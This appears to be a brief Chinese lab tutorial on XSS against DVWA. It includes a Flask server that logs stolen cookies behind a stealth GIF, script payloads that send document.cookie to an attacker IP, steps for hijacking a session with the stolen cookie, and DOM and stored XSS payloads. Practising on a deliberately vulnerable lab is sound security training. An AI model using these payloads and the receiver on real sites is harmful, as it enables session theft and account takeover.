3种XSS攻击简单案例

1、接收cookie端攻击机上用python写个接收web程序flask

python 复制代码
from flask import Flask, request, Response

app = Flask(__name__)

@app.route('/')
def save_cookie():
    cookie = request.args.get('cookie', '')
    if cookie:
        with open('/root/cookies.txt', 'a') as f:
            f.write(f"{cookie}\n")
    
    # 返回1x1透明GIF(避免被用户察觉)
    return Response(b'GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;',  mimetype='image/gif')

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

2、dvwa靶机上进行xss测试(3种方法)

php 复制代码
<script>document.location='http://192.168.168.130/?cookie='+document.cookie;</script>
<script>fetch('http://192.168.168.130/?cookie=' + document.cookie);</script>

3、把获取的cookie中最后一个等号后面的是cookie值,打开火狐按F12,点击存储store,把获取的cookie值替换进去,就能直接打开不用账户密码了

???

dvwa中DOM型注入(直接在xss的dom网址上改后面的default=就能获取cookie)

php 复制代码
http://192.168.168.133/dvwa-master/vulnerabilities/xss_d/?default=<script>alert(document.cookie);</script>

???

dvwa中存储型注入(先按F12把name表单长度改长一点)

name中输入:

php 复制代码
<script>alert(document.cookie);</script>

message中随便输入:Payload

以后每次打开这个存储型页面就会弹cookie出来

相关推荐
昔人'1 小时前
css使用 :where() 来简化大型 CSS 选择器列表
前端·css
昔人'1 小时前
css `dorp-shadow`
前端·css
流***陌1 小时前
扭蛋机 Roll 福利房小程序前端功能设计:融合趣味互动与福利适配
前端·小程序
烛阴2 小时前
用 Python 揭秘 IP 地址背后的地理位置和信息
前端·python
前端开发爱好者2 小时前
尤雨溪官宣:"新玩具" 比 Prettier 快 45 倍!
前端·javascript·vue.js
why技术2 小时前
从18w到1600w播放量,我的一点思考。
java·前端·后端
欧阳呀2 小时前
Vue+element ui导入组件封装——超级优雅版
前端·javascript·vue.js·elementui
清风徐来QCQ2 小时前
css总结
前端
天***88963 小时前
js封装一个双精度算法实现
开发语言·前端·javascript
Algebraaaaa3 小时前
什么是前端、后端与全栈开发,Qt属于什么?
开发语言·前端·qt